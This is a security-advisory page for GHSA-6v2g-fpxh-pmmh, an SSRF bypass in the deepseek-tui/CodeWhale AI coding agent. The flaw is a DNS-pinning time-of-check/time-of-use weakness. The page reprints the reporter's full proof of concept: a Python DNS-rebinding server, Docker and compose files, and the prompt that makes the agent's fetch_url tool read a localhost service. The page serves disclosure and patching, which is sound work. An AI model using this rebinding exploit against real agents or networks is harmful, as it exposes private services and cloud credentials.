Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
🦀
🦀 crates.io📦 npm
Not in CISA KEV
HIGH severity

GHSA-6v2g-fpxh-pmmh — deepseek-tui

HIGHFix: Hmbown/CodeWhale@26de44a

GHSA-6v2g-fpxh-pmmh is a high-severity (CVSS 8.6) Server-Side Request Forgery (SSRF) vulnerability in deepseek-tui. A fix is available for deepseek-tui — see the affected versions and patch details below.

CodeWhale: SSRF‌ bypass - TOCTOU on DNS failure for DNS pinning

Also known asCVE-2026-75856
Published
Sep 4, 2026
Updated
Sep 4, 2026
Affected
4 pkgs
Patched
3 / 4
Exploits
None indexed
Exploitation data as of Oct 1, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Exploitation Status

Proof-of-concept exploit code exists

  • CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
  • CISA assesses this as automatable — exploitation doesn’t require manual, per-target effort, which raises the odds of mass scanning and opportunistic attacks.

Exploitation and automatability from CISA’s SSVC triage for GHSA-6v2g-fpxh-pmmh.

EPSS Exploitation Probability

via FIRST.org ↗
0.5%probability of exploitation in next 30 days
Lower Risk+0.13%
Lower risk than most CVEs40th percentile — riskier than 40% of all scored CVEsHighest risk
0.00%0.33%0.66%1.00%0.4%0.5%Sep 26Oct 26

Probability of exploitation in the next 30 days, from FIRST.org EPSS.

How urgent is this, really

GHSA-6v2g-fpxh-pmmh by exploitation likelihood (EPSS) against impact (CVSS). Outside the shaded patch-first corner.

Where this sits among everything scored

Of 381,682 CVEs with a current EPSS score, this one falls in the < 10% band (highlighted). Counts from FIRST.org, log-scaled.

Real-World Exposure

4 pkgs affected

How broadly this vulnerability is actually deployed: weekly install volume shows current usage, a proxy for how much of the ecosystem is exposed.

deepseek-tuicrates.io
693downloads / week

Description

Maintainer resolution

The CodeWhale maintainers validated this report. The affected package ranges are recorded in the advisory metadata. Version 0.8.64 contains the fix in commit 26de44a8bd5051f8f944ea60b2c37ae1d2b7d25e. Users should upgrade to 0.8.64 or later. The original reporter analysis is preserved below.

Summary

DNS-pinning failure allows natural failure of code, however with a custom DNS server that fails the initial requests and allows the secondary requests, it's possible to bypass the logic.

Details

Simplified attack scenario:

  1. Attacker asks agent to visit the mydomain.com.
  2. CodeWhale tries to resolve the IP of mydomain.com, however, the custom DNS server that's controlled by the attacker marks the request DNS‌ query as failed (Time of Check).
  3. CodeWhale allows the code to continue as it expects it request to fail again.
  4. On the secondary (Time of Use), the DNS server resolves mydomain.com to a local IP (e.g., 127.0.0.1)
  5. The request is executed and the content from port 80 is returned to the attacker, allowing full bypass of SSRF mitigations.

In the DNS-pinning section, when DNS fails, the code is allowed to continue as it's expected to fail. However

PoC

This is a custom DNS server that fails the first requests (in this case, the first and second requests must fail, while the 3rd and 4th are allowed due to A and AAAA DNS queries). Here is the code for the DNS‌ server(for PoC, should be placed in dnser/dns_resolver.py:

#!/usr/bin/env python3
"""
Local DNS Resolver — customizable request/response handling.
Uses only the standard library + dnslib.

Usage:
    pip install dnslib
    sudo python dns_resolver.py          # binds to 0.0.0.0:53 by default
    python dns_resolver.py --port 5353   # unprivileged port for testing
"""

import argparse
import socket
import threading
from dnslib import DNSRecord, DNSHeader, RR, QTYPE, A, CNAME, AAAA


UPSTREAM_DNS = ("8.8.8.8", 53)   # fallback resolver


def handle_no_aaaa(query: DNSRecord) -> DNSRecord | None:
    """Drop all AAAA requests."""
    if QTYPE[query.q.qtype] == "AAAA":
        reply = query.reply()
        reply.header.rcode = 3  # NXDOMAIN
        return reply
    return None

def handle_blocked(query: DNSRecord) -> DNSRecord | None:
    """Block domains by returning NXDOMAIN."""
    blocked = {"blocked.example.com.", "ads.tracker.io."}
    qname = str(query.q.qname)
    if qname in blocked:
        print(f"  [BLOCKED] {qname}")
        reply = query.reply()
        reply.header.rcode = 3          # NXDOMAIN
        return reply
    return None

failer = 0
MAX_FAIL = 2
MAX_SUCCESS = 2

def handle_overrides(query: DNSRecord) -> DNSRecord | None:
    global failer
    """Return hardcoded A records for specific names (split-horizon / local dev)."""
    overrides: dict[str, str] = {
        "myapp.local.":     "127.0.0.1",
        "devserver.local.": "192.168.1.100",
        "mydomain.com.":    "127.0.0.1",
    }
    qname = str(query.q.qname)
    qtype = QTYPE[query.q.qtype]

    if qname in overrides and qtype == "A":
        failer += 1
        cycle_pos = (failer - 1) % (MAX_FAIL + MAX_SUCCESS)  # position within cycle
        should_fail = cycle_pos < MAX_FAIL

        print(f"  [OVERRIDE] request={failer} cycle_pos={cycle_pos} fail={should_fail}")

        if should_fail:
            reply = query.reply()
            reply.header.rcode = 3
            reply.header.ra = 0
            return reply

        ip = overrides[qname]
        print(f"  [OVERRIDE] {qname} → {ip}")
        reply = query.reply()
        reply.add_answer(RR(qname, QTYPE.A, rdata=A(ip), ttl=0))
        reply.header.ra = 0
        return reply

    return None


def handle_rewrite(query: DNSRecord) -> DNSRecord | None:
    """Rewrite a CNAME transparently (resolve alias locally)."""
    rewrites: dict[str, str] = {
        # "old.internal.": "new.internal.",
    }
    qname = str(query.q.qname)
    if qname in rewrites:
        target = rewrites[qname]
        print(f"  [REWRITE] {qname} → {target}")
        reply = query.reply()
        reply.add_answer(RR(qname, QTYPE.CNAME, rdata=CNAME(target), ttl=60))
        return reply
    return None


def handle_upstream(query: DNSRecord) -> DNSRecord | None:
    """Forward the query to the upstream resolver."""
    try:
        raw = query.pack()
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(3)
        sock.sendto(raw, UPSTREAM_DNS)
        data, _ = sock.recvfrom(4096)
        sock.close()
        reply = DNSRecord.parse(data)
        print(f"  [UPSTREAM] {query.q.qname} → {UPSTREAM_DNS[0]}")
        return reply
    except Exception as e:
        print(f"  [UPSTREAM ERROR] {e}")
        return None


# Chain of responsibility — handlers are tried in order; first non-None wins.
HANDLERS = [
    handle_blocked,
    handle_overrides,
    handle_rewrite,
    handle_upstream,
]


# ─────────────────────────────────────────────────────────────────────────────
#  Server plumbing — no need to edit below this line
# ─────────────────────────────────────────────────────────────────────────────

def resolve(data: bytes) -> bytes:
    try:
        query = DNSRecord.parse(data)
        qname = str(query.q.qname)
        qtype = QTYPE[query.q.qtype]
        print(f"[QUERY] {qtype} {qname}")

        for handler in HANDLERS:
            reply = handler(query)
            if reply is not None:
                return reply.pack()

        # Fallback: SERVFAIL
        reply = query.reply()
        reply.header.rcode = 2
        return reply.pack()

    except Exception as e:
        print(f"[ERROR] Failed to parse/handle query: {e}")
        return b""


def udp_server(host: str, port: int) -> None:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((host, port))
    print(f"DNS resolver listening on {host}:{port} (UDP)")
    while True:
        data, addr = sock.recvfrom(4096)
        threading.Thread(
            target=lambda d=data, a=addr: sock.sendto(resolve(d), a),
            daemon=True,
        ).start()


def tcp_server(host: str, port: int) -> None:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(10)
    print(f"DNS resolver listening on {host}:{port} (TCP)")

    def handle_conn(conn: socket.socket) -> None:
        with conn:
            length_bytes = conn.recv(2)
            if len(length_bytes) < 2:
                return
            length = int.from_bytes(length_bytes, "big")
            data = conn.recv(length)
            response = resolve(data)
            conn.sendall(len(response).to_bytes(2, "big") + response)

    while True:
        conn, _ = srv.accept()
        threading.Thread(target=handle_conn, args=(conn,), daemon=True).start()


def main() -> None:
    parser = argparse.ArgumentParser(description="Local DNS resolver")
    parser.add_argument("--host", default="0.0.0.0", help="Bind address")
    parser.add_argument("--port", type=int, default=53, help="Bind port (use 5353 for unprivileged)")
    args = parser.parse_args()

    t_udp = threading.Thread(target=udp_server, args=(args.host, args.port), daemon=True)
    t_tcp = threading.Thread(target=tcp_server, args=(args.host, args.port), daemon=True)
    t_udp.start()
    t_tcp.start()

    try:
        t_udp.join()
    except KeyboardInterrupt:
        print("\nShutting down.")


if __name__ == "__main__":
    main()

Docker file to build it(dnser/Dockerfile):

FROM python:3.12-slim

WORKDIR /app

RUN pip install dnslib --no-cache-dir

COPY dns_resolver.py .

EXPOSE 53/udp
EXPOSE 53/tcp

CMD ["python", "-u", "dns_resolver.py", "--host", "0.0.0.0", "--port", "53"]

Then to simplify the test, we can set everything in a container and make the agent use the local DNS resolver:

docker-compose.yml:

services:
  dns-resolver:
    build: dnser
    container_name: dns-resolver
    restart: unless-stopped
    networks:
      dns-net:
        ipv4_address: 10.0.1.2

  a:
    image: ghcr.io/hmbown/deepseek-tui:latest
    container_name: tui
    environment:
      DEEPSEEK_API_KEY: sk-
    stdin_open: true
    tty: true
    dns: 10.0.1.2
    networks:
      - dns-net
    depends_on:
      - dns-resolver
    sysctls:
      net.ipv6.conf.all.disable_ipv6: 1



networks:
  dns-net:
    driver: bridge
    ipam:
      config:
        - subnet: 10.0.1.0/24

Then to check everything we could simply: sudo docker attach tui Prompt: read contnet of http://mydomain.com using fetch_url tools, no thinking just raw output The tool will allow the request to go through 127.0.0.1. To make sure it's not a false-positive I've also installed python in CodeWhale container and ran python3 -m http.server 80 as root to make sure the request can actually read content.

To read the logs from dns-resolver: sudo docker logs -f dns-resolver

Impact

Similar to other SSRF bypasses, other services private on the system, private network, and cloud credentials are at risk.

Affected Packages

4 total 3 fixed
EcosystemPackageVulnerable rangeFix
🦀crates.iodeepseek-tui≥ 0.8.5No fix
🦀crates.iocodewhale-tui≥ 0.8.41&&< 0.8.640.8.64cargo update -p codewhale-tui --precise 0.8.64
📦npmdeepseek-tui≥ 0.8.5&&< 0.8.410.8.41npm install deepseek-tui@0.8.41
📦npmcodewhale≥ 0.8.41&&< 0.8.640.8.64npm install codewhale@0.8.64

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for deepseek-tui, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    No patched version of deepseek-tui has shipped for GHSA-6v2g-fpxh-pmmh yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.

  3. Workarounds

    Restrict outbound requests from the affected component to an allowlist of hosts, block access to link-local and internal address ranges at the network layer, and require authentication on internal services so a forged request cannot reach them unauthenticated.

Frequently Asked Questions

### Maintainer resolution The CodeWhale maintainers validated this report. The affected package ranges are recorded in the advisory metadata. Version 0.8.64 contains the fix in commit 26de44a8bd5051f8f944ea60b2c37ae1d2b7d25e. Users should upgrade to 0.8.64 or later. The original reporter analysis is preserved below. ### Summary DNS-pinning failure allows natural failure of code, however with a custom DNS server that fails the initial requests and allows the secondary requests, it's possible to bypass the logic. ### Details Simplified attack scenario: 1. Attacker asks agent to visit the `my
O3 Security · Impact-Aware SCA

Is GHSA-6v2g-fpxh-pmmh in your dependencies?

Find it across crates.io, npm, including transitive dependencies.

GHSA-6v2g-fpxh-pmmh: SSRF (High 8.6) | O3 Security